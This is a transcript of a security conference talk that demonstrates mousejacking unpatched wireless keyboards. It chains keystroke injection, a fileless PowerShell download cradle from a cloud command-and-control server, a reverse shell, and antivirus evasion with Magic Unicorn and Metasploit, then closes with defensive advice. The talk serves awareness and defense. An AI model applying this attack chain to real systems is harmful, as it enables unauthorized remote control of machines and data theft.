← All talks

Scott Taylor: Exploring Common Hacking Techniques

BSides Calgary30:03124 viewsPublished 2020-12Watch on YouTube ↗
Speakers
Scott Taylor
Mentioned in this talk
Tools used
Magic UnicornncPowercatSimple HTTP Server
Platforms
Amazon EC2
Frameworks
Metasploit
Hardware
Crazy Radio
Languages
PowerShellPython
Vendors
AVGMcAfee
Show transcript [en]

hi everyone welcome and uh thanks for choosing my talk i i know there's a lot of really good ones uh today so i appreciate you choosing mine uh i promise i'll keep you entertained for the next 40-45 minutes i just want to start by thanking james and everyone that helped put b-sides calgary together i know it was a lot of work transitioning from a physical conference to a virtual one and they did a tremendous job i'm really excited to have been invited to be a speaker and i i hope i can put on a fun talk for everyone uh so today we're going to explore some common hacking tools and techniques you know organizations spend a lot of money

on cyber defenses but if you're not in offensive or pen testing space yeah you know you might not know quite what hacking really looks like so uh hopefully i can illustrate some of the concepts

so who am i uh my name's scott taylor and i work for mnp in their technology solutions group many people think of mnp as an accounting firm but we also have a large nationwide technology solutions team and uh cyber team that consults all across canada myself i work in a number of areas assessments cyber audit network architecture and penetration testing uh disclaimer though all the views in this presentation are my own and not necessarily representative of my company although there's nothing uh controversial here feel free to add me to uh linkedin and i'm shoot for root on twitter

so i'll start by saying the obvious don't do bad things i'm going to show you some in-depth hacking demos but keep a white hat and don't try this on anything where you don't own or have permission and certainly don't say well scott showed me how i'm going to be showing three demos all in progressive difficulty for the hacker and progressive negative impact for the victim and then we'll look at the risk and uh what that really means uh you know these talks for a mixed audience are a little tricky so you know i wanted to balance some beginner hacking concepts with some more advanced ones and have some fun and hopefully everyone gets a little something out of this talk

i'm gonna have to go through the slides uh somewhat quickly and you know 45 minutes isn't a whole ton of time for everything i want to show so uh let's let's get to it so a little hacking 101 if you're a bad guy what's the first thing you need to do we need an attack vector to breach the perimeter so much like juggernaut here how do we do that well fishing is as popular as ever these are all common attack factors credential compromise you know a site gets breached and you've used the same password for everything this is how ray-ban ads get put on your facebook by the way you could have a vulnerability an

operating system or network devices you know these are great if you find them but often they get patched fairly quickly so how about a vulnerability in wireless keyboards well it's not exactly common but it sure is fun so this is the one we're gonna explore today so enter mouse jacking this is the name of the vulnerability it's from way back in uh 2016 it was discovered by mark newlin in the bastille research team he did a talk on it at defcon in 2016 and i i recommend you check it out and in full for in-depth details it affects wireless mice and keyboards and we're talking specifically the 2.4 gigahertz variety not bluetooth basically all old models send

unencrypted traffic between the usb dongle and the keyboard all major vendors were largely affected we're talking logitech dell microsoft's and this attack will work up to 100 meters away which is about the length of a football field so that begs the question have you patched the firmware in your keyboard dongles you know the little little usb thingies that you plug into your computer almost universally the answer is no i used to work as a systems admin and i certainly never did i consulted i've consulted for hundreds of organizations and the answer is always no so if you're wondering to patch the firmware it takes about five minutes using a vendor provided application this doesn't seem like much but if you

have a thousand of these in your organization that can be quite the burden on it many companies elect to just buy new ones which aren't vulnerable so what we need to do all we need to do for this demo is one fifty dollar usb dongle called crazy radio uh we need to load a specialized firmware on the device these are sold online they seem cheaper than they are but we live in canada and you'll probably spend more in shipping than the dongle itself so this brings to the first visual here now if you've chosen not to patch your wireless devices this is a potential attack that can occur i'm going to illustrate the exact demo

that i'm going to show so the box on the left is me the attacker i'm sitting at a bus stop the box box on the right is representative of the victim in this case a desktop inside my house but it can be equally symbolic of a computer in your business consider the box itself to be the physical house or a firewall logical perimeter so step one we need a tool to probe if there's a vulnerability in range it responds it says yep i'm vulnerable to the mouse jack vulnerability and then we're going to inject keystrokes to the keyboard and open up notepad on the screen and we're going to leave a little message for the victim

now in this case the firewall doesn't even come into play we never touched the network network network layer so we were effectively walking right around it tools and prep work so the first tool we need to use is called jacket now this is a nifty little python script you can get off of github um these guys did a fantastic job on this it's going to leverage the crazy radio hardware that we purchased scan for vulnerable keyboards and allow us to write scripts for what we want to do in the attack when we first run the tool it discovers that i have a vulnerable logitech keyboard now note the mac address of the device and the type we're going to need that

later now i should also mention there's one limiting factor you might encounter if you do this if you run this in an area that picks up 50 of these there's nothing to identify it as the one you might be targeting you can run the attack on all 50 simultaneously but it can sometimes be tricky to get the uh the one you want in my case i was the only one in range now with the hardware in place and the initial scan identifying the target we will leverage a ducky script now if you aren't familiar with ducky scripts they are super simple scripts used for usb rubber duckies and those are little usb uh sticks you plug in to inject

keystrokes we aren't going to be using a rubber ducky but we're still going to be using this language to help inject wireless keystrokes the syntax is pretty easy to follow here the gui command it's the same as you hit in the windows key so gui r is the same as launching the run dialog box we insert a few delay commands just because the injection happens much faster than a human would be typing so we want to make sure it doesn't get ahead of itself the string command is what we'll be typing so in this case we're going to open up notepad and we're going to send a message to the victim machine and that's follow the

white rabbit neo or at least follow shoot for root on twitter we're saving this to a script called rabbit2.txt i had a one but this one worked better so let's go over these three screens before i start the demo i hope everything's big enough and and people can see it um i try to zoom in the best they could here on the left we have my attacking laptop with the crazy radio dongle attached i'm running a kali linux vm and the jacket script on the right we have the victim machine we know this is the victim machine because of the sad kitty on it this is a desktop inside my house on the on the bottom screen

you can see the footage from my ring camera in front of my house so you'll see me on the right side walking and sitting down at the bus stop to run this attack as we said before this will work up to 100 meters away from the target now the bus stop here is probably about 15 meters from where my computer is uh now i'll say this first putting a video presentation together that combines three different videos all simultaneous real time of each other was considerably more challenging than this actually the actual hack was so before i start let's just go over the syntax of the jacket command i'm running the jacket command you can see the

mac address that we picked up in our probe we're going to put that in there we're specifying the vendor we know it's a logitech and we're triggering my rabbit 2 ducky script

you can see me walking to the bus stop here as i trigger this attack it starts off doing a sniff for the mac address that we specified it picks it up it knows what channel to communicate with

and as the attack gets triggered watch on the right hand side we pull up notepad and we inject the malicious message that we want to put on the screen now i want to make it very clear i'm not on my whole network i've never i haven't touched the network layer at all i'm merely sitting 15 meters away from it so i have no internet connection at all on my and my bus stop

so what do we want to do next that leads us to our next demo here if i if we're the hacker and we want to take this to the next level we probably want to take full control over the machine now the difficulty of this is we don't have a visual on what's going on on the computer it's a one-way injection at this point we have no confirmation on our end that the injection succeeded nor do we have the ability to do much after at least yet our goal is the hacker is to get what's called a reverse shell now most people are familiar with the command prompt and it's kind of like that only think of it more as something

containing the command prompt the reverse shell connection is initiated on the victim machine and it's going to come back connect back to us listening for it now every business has a firewall every home user has one your router will act as one even if you just have a modem from your isp there's still a firewall blocking the bad stuff from coming in you know a firewall is in place to prevent us from uh barreling in like juggernaut but remember we are effectively already on the inside uh from our keyboard attack so if we initiate the communication starting from the inside it's it's less closely scrutinized going outbound especially if we use a common port like

80 or 443. these are used for http and https uh web browsing so you know these these aren't going to be monitored on the way out we can we can kind of blend in a little easier so that brings us to uh the visual number two for our second demo the setup here is the same i'm still at the bus stop the only difference is i've added a command and control server to the mix and what this is it's a server that i can host my malware on if i can convince the victim to pull my malware down i'll hopefully receive my reverse shell back at it so for this i've spun up an ec2 instance

on amazon cloud services now remember i'm at the bus stop i don't have any internet connection so i'm going to use my brand new iphone and utilize that suite 5g to have a hotspot so i can ssh into my cloud now this doesn't use much data because all the transfers are going to be between the desktop inside the house and my c2 server in the cloud which happens to be in northern virginia because i didn't change the default region so here we're going to probe looking for the vulnerability it's going to come back it's going to tell us that is vulnerable we're going to inject key strokes again only this time we want to trigger power

shell to dial home to our command and control server we're going to host the malicious ps1 script on a web server in the cloud and it's going to fire back poisoning the computer and telling it to create a reverse shell back to us in the cloud server and i'm still never touching the network here at all all i'm doing is connecting through my 5g hotspot to my command and control server as well as injecting the malicious traffic into my computer inside the house so prep work we need uh first i need to spin up an aws ec2 instance now this is pretty straightforward note the ip address we're going to need this later aws is great for this kind of stuff if

you're a white hat i should mention an actual threat actor probably isn't going to use aws as it's not exactly anonymous you have to give a credit card uh they're more likely to spin up an anonymous vps that they paid for with bitcoin uh you generally don't want a trail leading back to you the other thing i should mention is when you set up an aws instance lock down your public facing ports to the networks that you'll be talking to otherwise you'll be barraged with bots trying to probe and hack you within minutes you know bloody hackers they just trying to make a hacking video and they to get all up in your business so the two tools um that we're going to

use here they're kind of similar and they kind of go hand in hand netcat is a very common networking utility that helps establish tcp and udp connections and powercat is a very similar variant to this it's basically a powershell function that acts like netcat it's a fairly robust tool um but establishing our reverse shell is all we need for this demo it's a lot of cats and shells i know but stick with me we also need a web server to host our malware now we could use something robust like apache but all we need to do is share out a file and for this we can use a very simple and handy python module called simple

http server and that's exactly what it is you call this module and it'll just share all the files in the directory next we need to adjust our ducky script it's basically the same as before but instead of calling notepad we're going to call a command prompt which is in turn going to call power the powershell download cradle now a download cradle is a single line command to instruct the computer to go download something from a website as a string and then execute it uh in our case it's our malicious power cap payload now the best part of this is it runs fileless which means it never touches the disk it only runs in memory if we just go

through the syntax here iex that's short for invoke expression the system.net.webclat web client is a class and the download string is a method you can see it pointing to our aws ip address that we're hosting on port 80 in our command and control server so we just could say http it already knows it's going to be port 80. the next part of the command after the semicolon it's going to call power cat and send a command shell back to us listening for it on port 443 sound complicated yet so expected loot this is purely just to show you uh what's on the victim's computer for a visual sake uh at the root of c i've placed a

directory called super secret docs with some secret documents on there like credit card numbers so when we get a reverse shell back we want to look and see if we can find this it's obviously a fake credit card it starts with one two three four and ends in one two three four okay so as i start this demo i'm going to run tmux just so i can split up the panes on my attacking uh machine

i'm just going to pause it here it gets kind of cut off here but i'm ssh eating into my amazon cloud service here so the blue pings i'm going to have that on the top and the bottom the blue are going to be in the cloud the red is still my attacking laptop

now all i'm doing here is changing into the power cat directory remember we're going to host the web server here just share out the malicious ps1 script i was going to show the code and stuff but that's getting a little uh a little low level so just keep on a high level idea we're sharing out the malicious file in that game on the pane below this is where we're going to create our listener so all this does is going to be listening for our return shell on port 443 i'm going to go back to my attacking laptop here i'm just going to take our ducky script or jacket and ducky script command and we're going to use this to trigger

the keystrokes inside the house so same deal as before we're going to inject into here only we're going to call a command prompt and hopefully we get our reverse shell back i know it's a little small on this screen on the right but that's uh i showed on the screen before what it's what it's coming up there is so you can see it pulling our malicious file off of port 80 here and look we get a command prompt back here i'm going to change into the c directory i'm going to have a look at the super secret docs folder

and there's my credit card file one two three four one two three four so effectively now we've taken full control over the machine and i have never touched the network so a little a word about privileges you get whatever context the user logged into the machine is coming back to you on the reverse shell so this if this is a home machine you'll likely be an admin and the attacker has complete control now if this is a corporate environment and you're a regular user you only get that level you can only see the files that the user can see if you manage to get a local admin or even better a domain admin that would be

great from the attacker's point of view if this was a business and you did only get a regular user the next step would be to escalate the privileges and there are many techniques to do this then one would use this as a pivot point in the network and move laterally until you find whatever you want so let's think about a hypothetical uh situation right now for those of you in the industrial controls world and i know a lot of you in calgary are if if this is an operator console and your hmi runs off of here let's say you haven't followed your purdue model and segmented your network appropriately if there's a path out to internet from

it you just let the attacker have the keys to your plans from anywhere in the world all from a 50 dongle and a cloud server that costs five cents an hour so let's talk incident response for a second say we just did this attack on bob's corporate computer and extracted the secret files an incident gets triggered and they start investigating this machine now i'm not an ir guy or a forensics guy but i'm guessing the logs are going to look a little funny here we didn't do anything to disguise what we're doing so the logs will be noisy they're going to say what we did but the great thing is we never touched the network at all it's gonna look like

bob typed all this in on his own is bob a malicious insider chances are it is gonna take this machine they're gonna re-image it to be sure that there's no malware on it even though we never touched the disc um but this doesn't fix the hole they're gonna plug that same keyboard right back in it's the last thing they're gonna they're gonna think about so we can just come back later on and and do it all over again but just something to think about so next thing you're going to ask well what about antivirus isn't that going to catch this the answer is yes it definitely might but that doesn't mean we can't tweak things a little bit to get around it if

it does block so antivirus even free ones like abg they're really good at protecting you against yourself you know sketchy websites you visit things you click that you aren't supposed to that type of thing they aren't perfect against targeted attacks they typically work at the most basic level identifying known attack signatures and known behaviors but if you can obfuscate those enough you might be able to slip something by and i'm not picking on the vendors here these are all quality products i think even some are sponsoring this event so for my home computer i'm using avg uh if you're using you know if you're attacking with well-known tools and payloads chances are you will you'll get blocked uh and this

topic tends to be a bit of a cat and mouse game between offensive tools and defensive detection you can usually test this out in the lab saying which of your payloads will bypass and which will get caught if you happen to know which one you're attacking the better sometimes blind as the attacker but sometimes not i'll give you an example if i was targeting your organization i would bring up all the i.t job postings that you've had in the past do a little ocean here if they all say you need to have and this is just an example mcafee endpoint experience next i'd look up all your security staff on linkedin and if i notice they're they're all

using mac they're also mcafee certified i can probably make an educated guess as to what i'm dealing with on the other end so that leads us to the next tool uh this one's called magic unicorn and this was uh written by trusted sec dave kennedy this is a really great tool this will allow us to write shell code right into memory and it's great for passing uh bypassing antivirus and anti-malware scanning interfaces it integrates right with metasploit we can simply run a python script it's going to generate a bunch of code which writes to a file we can host a file called powershell attack and we can catch our shell back in metasploit which is a comprehensive offensive

framework i'm sure most of you are fairly familiar with so i've got full disclosure on this third demo i am doing this one purely locally i'm not at the bus stop anymore just for the sake of time and complexity but there's nothing to stop you from just chaining our previous attacks with this one so i start this i've already i've already cued up my command on the uh on the victim computer but you can you can inject the keystrokes and do this just the same here i'm going to run the unicorn script on my attacking computer uh the payload i'm creating is a windows meterpreter reverse tcp payload so this is this is a metasploit

interpreter payload i'm specifying my attacking machine in my attacking port takes a second for this to run

okay now once it runs it generates two different files that we talked about the first file is the powershellattack.txt that's the one with all of our code in it that we're going to host the next one is unicorn.rc and that's just kind of like a packaged metasploit file that that puts all of our parameters in that we need

so here i'm just going to view the powershell attack file and that looks like a bunch of gibberish it's a bunch of shell code that not really human readable but it also kind of fools the antivirus a little bit this is just going to get injected straight into memory but it when it really is cooked into this is our reverse shell

on our left hand pane i'm gonna i'm gonna fire up metasploit we're gonna host this file on this one on port 80 as we talked about and while this is running i want to point you to the victim computer on the right here we're just going to go look in the in the trade we're going to hover over avg protected windows security protected so i got all the defensive layers turned on on this computer we start our uh our handler on the left so we're going to be listening on port 443 just as we did before and when we launch the attack the window disappears you can see it pulling our file from here it doesn't get request that pulls

powershell attack code 200 means it's a success it takes a minute or two for it to pop back and we get a meterpreter shell coming back let's just check out our sessions and there's our shell so we we still have access to this computer and antivirus didn't see it at all so let's bring all this full circle and let's talk about what really matters and that that's risk so risk is likelihood times impact now i don't want to suggest that there is a high likelihood that there will be a skilled enough hacker sitting at your community bus stop or outside your business or your plant but you always need to be conscious of what data or systems you're protecting

and always use a defense in-depth strategy if you're a business that could be a high-value target you should consider the potential impact here uh would your nessa scan have caught this vulnerability no did the compliance framework you've been checking boxes off deal with this directly no not really so just something to think about so takeaways if what you got out of this presentation is i need to go patch my keyboard dongles well that's good but a better takeaway is be conscious of all the devices coming into your network maybe i don't get you off the keyboard maybe i get you through your printer or your doorbell camera or your smart toaster and most importantly uh the only true

defense is a layered one as you can tell hackers like to chain techniques together to defeat your defenses uh you need defense and depth if application whitelisting or powershell script monitoring uh was on this could probably stop the attack if the outbound traffic is inspected that might have stopped the attack if uh users have proper security awareness maybe bob notices the big black and blue screens popping up on his screen and tells it about it and maybe that stops the attack anyway just something to think about so i i'm out of time now for uh for my presentation but uh i really hope you guys enjoyed my talk and uh like i said i'll be around in the networking portion

if you have any questions about this talk or cyber security in general or career advice i'm i'm happy to talk

Related talks

49:18
Aarti Gadhia: There is no security skills shortage!
BSides Calgary
36:16
Michael Spaling: Anxiety Society: My Struggle With Mental Health In The Cybersecurity Industry
BSides Calgary · 2020
50:09
Closing Keynote
BSides Calgary · 2020
50:04
Aarti Gadhia: Building Your Brand in Information Security
BSides Calgary · 2021
58:55
AJ Leece: Malware Analysis for Incident Response
BSides Calgary
1:29:20
Incidents and Accidents: A Security Incident Response Game
BSides Calgary